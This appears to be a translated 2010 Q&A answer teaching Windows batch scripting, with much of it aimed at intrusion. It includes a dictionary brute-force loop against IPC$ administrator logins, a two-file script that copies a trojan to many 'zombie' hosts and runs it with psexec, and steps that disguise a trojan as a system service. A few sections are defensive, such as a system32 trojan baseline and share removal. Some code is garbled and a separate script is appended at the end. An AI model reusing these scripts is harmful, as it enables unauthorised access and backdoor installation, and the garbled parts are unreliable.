Tianliangshuowan'an, Level 4
2010-02-05 Answer
I have many, hope it helps you
Supplementary:
I. Brief Introduction to Simple Batch Processing Internal Commands
1. Echo command
Turns the command echo function on or off, or displays a message. Without parameters, the echo command displays the current echo setting.
Syntax:
echo
Sample: @echo off / echo hello world
In practical applications, we will combine this command with the redirection symbol (also called the pipe symbol, generally using > >> ^) to implement inputting some commands into files of a specific format. This will be reflected in subsequent examples.
2. @ command
Indicates not to display the command after @. In the process of intrusion (for example, using a batch to format the enemy's hard disk), of course, we cannot let the other party see the commands we use.
Sample: @echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (the format command cannot use the /y parameter. Fortunately, Microsoft left the autoset parameter for us, and the effect is the same as /y.)
3. Goto command
Specify to jump to the label. After finding the label, the program will process the commands starting from the next line.
Syntax: goto label (label is the parameter, specifying the line in the batch program to be turned to.)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms (If you don't understand if, %1, %2 here, skip it first, and there will be detailed explanations later.)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
The name of the label can be any, but it is best to use meaningful letters. Add : in front of the letter to indicate that this letter is a label. The goto command is to find where to jump next according to this :. It is best to have some descriptions so that others can understand your intention.
4. Rem command
Comment command, which is equivalent to /*--------*/ in C language. It will not be executed, but only plays a comment role, which is convenient for others to read and your own future modification.
Rem Message
Sample: @Rem Here is the description.
5. Pause command
When the Pause command is run, the following message will be displayed:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d:\back
echo Please put a new disk into driver A
pause
goto begin
In this example, all files on the disk in drive A are copied to d:\back. When the displayed comment prompts you to put another disk into drive A, the pause command will suspend the program so that you can change the disk, and then press any key to continue processing.
6. Call command
Call another batch program from a batch program, and the parent batch program will not be terminated. The call command accepts the label used as the call target. If used outside a script or batch file, Call will not work on the command line.
Syntax:
call FileName ] ]
Parameters:
FileName
Specify the location and name of the batch program to be called. The filename parameter must have the .bat or .cmd extension.
7. start command
Call an external program. All DOS commands and command-line programs can be called by the start command.
Common parameters:
MIN starts with the window minimized
SEPARATE starts a 16-bit Windows program in a separate space
HIGH starts the application in the HIGH priority category
REALTIME starts the application in the REALTIME priority category
WAIT starts the application and waits for it to end
parameters These are parameters passed to the command/program
When the executed application is a 32-bit GUI application, CMD.EXE returns to the command prompt without waiting for the application to terminate. If executed in a command script, this new behavior will not occur.
8. choice command
The choice command allows the user to enter a character to run different commands. When using it, the /c: parameter should be added. The characters that can be entered should be written after c:, with no spaces in between. Its return code is 1234......
For example: choice /c:dme defrag,mem,end
The following will be displayed
defrag,mem,end?
Sample:
The content of Sample.bat is as follows:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (The highest error code should be judged first)
if errorlevel 2 goto mem
if errorlevel 1 goto end
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye
After this file is run, defrag,mem,end? will be displayed. The user can choose d m e, then the if statement will make a judgment. d means executing the program segment labeled defrag, m means executing the program segment labeled mem, e means executing the program segment labeled end. Each program segment finally uses goto end to jump the program to the end label, then the program will display good bye, and the file ends.
9. If command
if means to judge whether the specified condition is met, so as to decide to execute different commands.
There are three formats:
1) if "parameter" == "string" command to be executed
If the parameter is equal to the specified string, the condition is established, and the command is run, otherwise the next sentence is run. (Note that there are two equal signs)
Such as if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
2) if exist filename command to be executed
If the specified file exists, the condition is established, and the command is run, otherwise the next sentence is run.
Such as if exist config.sys edit config.sys
3) if errorlevel / if not errorlevel number command to be executed
If the return code is equal to the specified number, the condition is established, and the command is run, otherwise the next sentence is run.
Such as if errorlevel 2 goto x2
All DOS programs return a number to DOS when running, called errorlevel or return code. Common return codes are 0 and 1.
10. for command
The for command is a relatively complex command, mainly used to loop and execute commands within a specified range of parameters.
When using the FOR command in a batch file, use %%variable to specify the variable
for {%variable|%%variable} in (set) do command
%variable specifies a single letter replaceable parameter.
(set) specifies one or a group of files. Wildcards can be used.
command specifies the command to be executed for each file.
command-parameters specify parameters or command-line switches for a specific command.
When using the FOR command in a batch file, use %%variable to specify the variable
instead of %variable. Variable names are case-sensitive, so %i is different from %I
If command extensions are enabled, the following additional FOR command formats will be supported:
FOR /D %variable IN (set) DO command
If the set contains wildcards, it is matched against directory names instead of file names.
FOR /R [[drive:]path] %variable IN (set) DO command
Walks the directory tree rooted at path, executing the FOR statement in each directory of the tree. If no directory is specified after /R, the current directory is used. If the set is just a single dot (.) character, it only enumerates the directory tree.
FOR /L %variable IN (start,step,end) DO command
The set is a sequence of numbers from start to end, in steps of step.
So (1,1,5) generates the sequence 1 2 3 4 5, and (5,-1,1) generates the sequence 5 4 3 2 1.
FOR /F %variable IN (file-set) DO command
FOR /F %variable IN ("string") DO command
FOR /F %variable IN ('command') DO command
Or, if the usebackq option is used:
FOR /F %variable IN ("file-set") DO command
FOR /F %variable IN ('string') DO command
FOR /F %variable IN (`command`) DO command
filenameset is one or more file names. Each file is opened, read, and processed before going on to the next file in filenameset.
Processing consists of reading the file, breaking it into individual lines of text, and then parsing each line into zero or more tokens. The body of the for loop is then called with the variable value(s) set to the token string(s) found. By default, /F passes the first blank-separated token from each line of each file. Blank lines are skipped. You can override the default parsing behaviour by specifying the optional "options" parameter. This is a quoted string which contains one or more keywords specifying different parsing options. The keywords are:
eol=c - specifies an end-of-line comment character (just one)
skip=n - specifies the number of lines to skip at the beginning of the file.
delims=xxx - specifies a delimiter set. This replaces the default delimiter set of space and tab.
tokens=x,y,m-n - specifies which tokens from each line are to be passed to the for body on each iteration. This causes additional variable names to be allocated. The m-n form is a range, selecting the mth through the nth tokens. If the last character of the tokens= string is an asterisk, an additional variable is allocated and receives the remaining text of the line after the last token parsed.
usebackq - specifies that the new semantics are in force: a back-quoted string is executed as a command, a single-quoted string is a literal string, and file names in file-set may be enclosed in double quotes.
sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command
It will analyze each line in myfile.txt, ignore those lines starting with semicolons, and pass the second and third symbols in each line to the for program body; delimited by commas and/or spaces. Please note that the statement of this for program body refers to %i to get the second symbol, %j to get the third symbol, and %k to get all the remaining symbols after the third symbol. For file names with spaces, you need to enclose the file name in double quotes. To use double quotes in this way, you also need to use the usebackq option, otherwise, the double quotes will be understood as being used to define a string to be parsed.
%i is specifically explained in the for statement, and %j and %k are specifically explained through the tokens= option. You can specify up to 26 symbols through tokens= in one line, as long as you do not try to specify a variable higher than the letter 'z' or 'Z'. Remember that FOR variables are single letters, case-sensitive, and global; and there cannot be more than 52 in use.
You can also use the FOR /F analysis logic on adjacent strings; the method is to enclose the filenameset between parentheses with single quotes.
In this way, the string will be treated as a single input line in a file.
Finally, you can use the FOR /F command to analyze the output of the command. The method is to turn the filenameset between parentheses into a backquoted string. This string will be treated as a command line, passed to a sub CMD.EXE, and its output will be captured in memory and treated as a file analysis. Therefore, the following example:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
It will enumerate the environment variable names in the current environment.
In addition, the replacement of FOR variable references has been enhanced. You can now use the following option syntax:
%~I - remove any quotes ("), expand %I
%~fI - expand %I to a fully qualified path name
%~dI - only expand %I to a drive letter
%~pI - only expand %I to a path
%~nI - only expand %I to a file name
%~xI - only expand %I to a file extension
%~sI - the expanded path only contains short names
%~aI - expand %I to the file attributes of the file
%~tI - expand %I to the date/time of the file
%~zI - expand %I to the size of the file
%~$PATH:I - searches the directories listed in the PATH environment variable and expands %I to the fully qualified name of the first one found. If the environment variable is not defined, or the file is not found, this modifier expands to an empty string
You can combine modifiers to get multiple results:
%~dpI - only expand %I to a drive letter and path
%~nxI - only expand %I to a file name and extension
%~fsI - only expand %I to a complete path name with a short name
%~dp$PATH:I - searches the directories listed in the PATH environment variable and expands %I to the drive letter and path of the first one found.
%~ftzaI - expand %I to a DIR-like output line
In the above examples, %I and PATH can be replaced by other valid values. The %~ syntax is terminated by a valid FOR variable name. Choosing an uppercase variable name like %I makes it more readable and avoids confusion with the modifiers, which are not case-sensitive.
The above is the official help from MS. Below we give a few examples to specifically illustrate the use of the For command in intrusion.
sample2:
Use the For command to implement brute-force password cracking on a target Win2k host.
We use net use \\ip\ipc$ "password" /u:"administrator" to try to connect with the target host. When it is successful, record the password.
The main command is a line: for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
Use i% to represent the password of admin. In dict.txt, the value of i% is taken to connect with the net use command. Then the running result of the program is passed to the find command -
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"│find ":The command completed successfully">>D:\ok.txt, and then it's done.
sample3:
Do you ever have a large number of zombies waiting for you to plant backdoors + trojans? When the number is particularly large, what was originally a happy thing will become very depressed:) The article mentioned at the beginning that using batch files can simplify daily or repetitive tasks. So how to achieve it? Hehe, you will understand when you read on.
The main command is also only one line: (when using the FOR command in a batch file, specify the variable using %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
For the usage of tokens, please refer to sample1 above. Here it means to pass the content in victim.txt to the parameters %i %j %k in door.bat in sequence.
And cultivate.bat is nothing more than using the net use command to establish an IPC$ connection, and copy the trojan + backdoor to the victim, then use the return code (If errorlever =) to screen the host that successfully plants the backdoor, and echo it out, or echo it to a specified file.
delims= means that the content in vivtim.txt is separated by a space. I think you must understand what the content in this victim.txt is like when you see here. It should be arranged according to the objects represented by %%i %%j %%k. Generally, it is ip password username.
Code outline:
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------
------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------
------
------------------- cut here then save as a batchfile(I call it door.bat) ------------------
-----------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection ............OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3
>>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------
------------
This is just a prototype of an automatic backdoor planting batch. The two batch files, the backdoor program (Windrv32.exe), and PSexec.exe need to be placed in the same directory. The batch content
can also be expanded, for example: add functions to clear logs + DDOS, add functions to add users regularly, and go deeper to make it have automatic propagation functions (worms). I won't go into details here. Interested friends can study it by themselves.
II. How to Use Parameters in Batch Files
Parameters can be used in batch files. Generally there are nine parameters, %1 to %9. When there are more parameters, shift is needed to move through them; this is not common, so we don't consider it.
sample1: fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/autoset
@echo please insert another disk to driver A.
@pause
@goto format
It can't be written down, sent in several batches!!!
Supplementary:
This example is used to continuously format several floppy disks, so when using it, you need to enter fomat.bat a in the dos window. Hehe, it seems a bit superfluous~
sample2:
When we always need to enter a long string of commands to establish an IPC$ connection, and it is easy to make mistakes, so we might as well write some fixed commands into a batch, and use the ip password username of the zombie as parameters to assign to this batch, so that we don't need to type the commands every time.
@echo off
@net use \\%1\ipc$ "%2" /u:"%3" Note that here PASSWORD is the second parameter.
@if errorlevel 1 echo connection failed
How about it, using parameters is still relatively simple? You must have learned it. No.3
III. How to Use Compound Commands (Compound Command)
1. &
Usage: First command & Second command
Use this method to execute multiple commands at the same time, regardless of whether the command is executed successfully
Sample:
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:51 .
2002-05-14 23:51 ..
2002-05-14 23:51 14 sometips.gif
2.&&
Usage: First command && Second command
Use this method to execute multiple commands at the same time. When encountering a command that fails to execute, the subsequent commands will not be executed. If there is no error, all commands will be executed all the time;
Sample:
C:\>dir z: && dir c:\Ex4rch
The system cannot find the path specified.
C:\>dir c:\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:55 .
2002-05-14 23:55 ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.
This command may be used more simply when doing backups, such as:
dir \\192.168.0.1\database\backup.mdb && copy \\192.168.0.1\database\backup.mdb E:\backup
If the backup.mdb file exists on the remote server, the copy command will be executed. If the file does not exist, the copy command will not be executed. This usage can replace IF exist.
3. ||
Usage: First command || Second command
Use this method to execute multiple commands at the same time. When encountering a command that executes correctly, the subsequent commands will not be executed. If no correct command appears, all commands will be executed all the time;
Sample:
C:\Ex4rch>dir sometips.gif || del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
Example of combined command use:
sample:
@copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3
>>victim.txt
IV. Use of Pipe Commands
1. | command
Usage: First command | Second command
Use the result of the first command as the parameter of the second command. Remember that this method is very common in unix.
sample:
time /t>>D:\IP.log
netstat -n -p tcp|find ":3389">>D:\IP.log
start Explorer
Can you see it? Terminal Services lets us set a custom startup program for a user; by having the user run this bat, we obtain the IP address of the logged-in user.
2. >, >> output redirection command
Redirect the output result of a command or a certain program to a specific file. The difference between > and >> is that > will clear the content in the original file and then write to the specified file, while >> will only append content to the specified file without changing the content in it.
sample1:
echo hello world>c:\hello.txt (stupid example?)
sample2:
Nowadays, DLL trojans are popular. We know that system32 is a good place to hide. Many trojans are sharpening their heads to get in there, and DLL horses are no exception. In response to this point, we can record the EXE and DLL files in this directory after installing the system and necessary applications:
Run CMD--switch the directory to system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
In this way, the names of all EXE and DLL files are recorded in exeback.txt and dllback.txt respectively,
In the future, if there is an abnormality but no problem is found by traditional methods, it is necessary to consider whether a DLL trojan has entered the system.
At this time, we use the same command to record the EXE and DLL files in system32 into exeback1.txt and dllback1.txt, and then run:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>>diff.txt. (Use the FC command to compare the two listings of DLL and EXE files and write the result to diff.txt; the second fc appends so that it does not overwrite the first result.) This lets us find any extra DLL and EXE files.
Then, by checking the creation time, version, whether it is packed, and so on, it is easier to judge whether a DLL trojan has got in. Best if there is none. If there is, don't DEL it directly: first use regsvr32 /u trojan.dll to unregister the backdoor DLL, then move it to the recycle bin. If the system shows no abnormal behaviour, delete it completely or submit it to the antivirus company.
3. < 、>& 、<&
< reads the command input from the file instead of from the keyboard.
>& writes the output of one handle to the input of another handle.
<& reads input from one handle and writes it to the output of another handle.
These are not commonly used, so I won't introduce them more.
V. How to Use Batch Files to Operate the Registry
In the process of intrusion, we often operate the specific key values of the registry to achieve certain purposes. For example, to hide the residual key values of the backdoor and trojan program, or to create a service to load the backdoor. Of course, we will also modify the registry to strengthen the system or change a certain attribute of the system. These all require us to have a certain understanding of registry operations. Below we first learn how to use the .REG file to operate the registry. (We can use a batch to generate a REG file)
Regarding the operation of the registry, the common ones are creation, modification, and deletion.
1. Creation
Creation is divided into two types, one is to create a subkey (Subkey)
We create a file with the following content:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
Then execute this script, and you have created a subkey named "hacker" under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft.
The other is to create a project name
Then this file format is a typical file format, consistent with the file format you export from the registry, and the content is as follows:
Windows Registry Editor Version 5.00
"Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\door.exe
"Autodos"=dword:02
In this way, three projects, Invader, Door and Autodos, are newly created under
The type of Invader is "String value"
The type of door is "REG SZ value"
The type of Autodos is "DWORD value"
2. Modification
Modification is relatively simple. Just export the project you need to modify, then modify it with Notepad, and then import it (regedit /s).
3. Deletion
Let's first talk about deleting a project name. We create a file as follows:
Windows Registry Editor Version 5.00
"Ex4rch"=-
Execute this script, and "Ex4rch" under is deleted;
Let's take a look at deleting a subkey. We create a script as follows:
Windows Registry Editor Version 5.00
Execute this script, and has been deleted.
I believe you have basically mastered the .reg file when you see here. Then the current goal is to use a batch to create a .reg file with specific content. Remember that we mentioned earlier that the redirection symbol can be used to easily create files of a specific type.
sample1: For example, the above example. If you want to generate the following registry file
Windows Registry Editor Version 5.00
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
You only need to do this:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo >Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
sample2:
When we are using some relatively old trojans, we may generate a key value under the registry
to realize the self-start of the trojan. But this is very easy to expose the path of the trojan program, thus leading to the trojan being killed. Relatively speaking, if the trojan program is registered as a system service, it is relatively safe. Take the configured IRC trojan DSNX as an example (named windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath=
c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM
@REM This is safer.
VI. Wonderful Example Release.
1. Batch to delete the default shares of win2k/xp system
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo preparing to delete all the default shares.when ready press any key.
@pause
@echo off
:Rem check parameters if null show usage.
if {%1}=={} goto :Usage
:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleted
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:\delshare.reg
http://wenwen.sogou.com/z/q178444210.htm
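As an added example (not code from the original post), the following batch file turns the system32 baseline-and-compare procedure from sample2 of section IV into a reusable script. It assumes %SystemRoot%\system32 as the directory to watch and uses the exeback.txt/dllback.txt file names from the text; the file names and the "baseline"/"check" arguments are this example's own choices.

```batch
@echo off
setlocal
rem Added example: record the EXE/DLL names in system32 once (baseline),
rem then compare later listings against it with fc, as the text describes.
rem Assumptions: run from a cmd prompt; baseline files live in the current directory.
set "TARGET=%SystemRoot%\system32"
set "BASE_EXE=exeback.txt"
set "BASE_DLL=dllback.txt"

if "%1"=="baseline" goto baseline
if "%1"=="check" goto check
echo Usage: %~nx0 baseline ^| check
goto end

:baseline
rem /b prints bare names, /a-d skips directories; sort keeps fc output stable.
dir /b /a-d "%TARGET%\*.exe" | sort > "%BASE_EXE%"
dir /b /a-d "%TARGET%\*.dll" | sort > "%BASE_DLL%"
echo Baseline written to %BASE_EXE% and %BASE_DLL%.
goto end

:check
if not exist "%BASE_EXE%" (
    echo No baseline yet; run "%~nx0 baseline" first.
    goto end
)
dir /b /a-d "%TARGET%\*.exe" | sort > exeback1.txt
dir /b /a-d "%TARGET%\*.dll" | sort > dllback1.txt
rem fc sets errorlevel 1 when the lists differ. The first compare uses > and
rem the second >> so the DLL report does not overwrite the EXE report.
fc "%BASE_EXE%" exeback1.txt > diff.txt
set "CHANGED=%errorlevel%"
fc "%BASE_DLL%" dllback1.txt >> diff.txt
if errorlevel 1 set "CHANGED=1"
if "%CHANGED%"=="0" (
    echo No new or missing EXE/DLL names in %TARGET%.
) else (
    echo Differences found, see diff.txt. Check each extra file's creation time and version before acting.
)
goto end

:end
endlocal
```

Run it once with the baseline argument after installing the system and the needed applications, then periodically with check; diff.txt lists the names that were added or removed since the baseline.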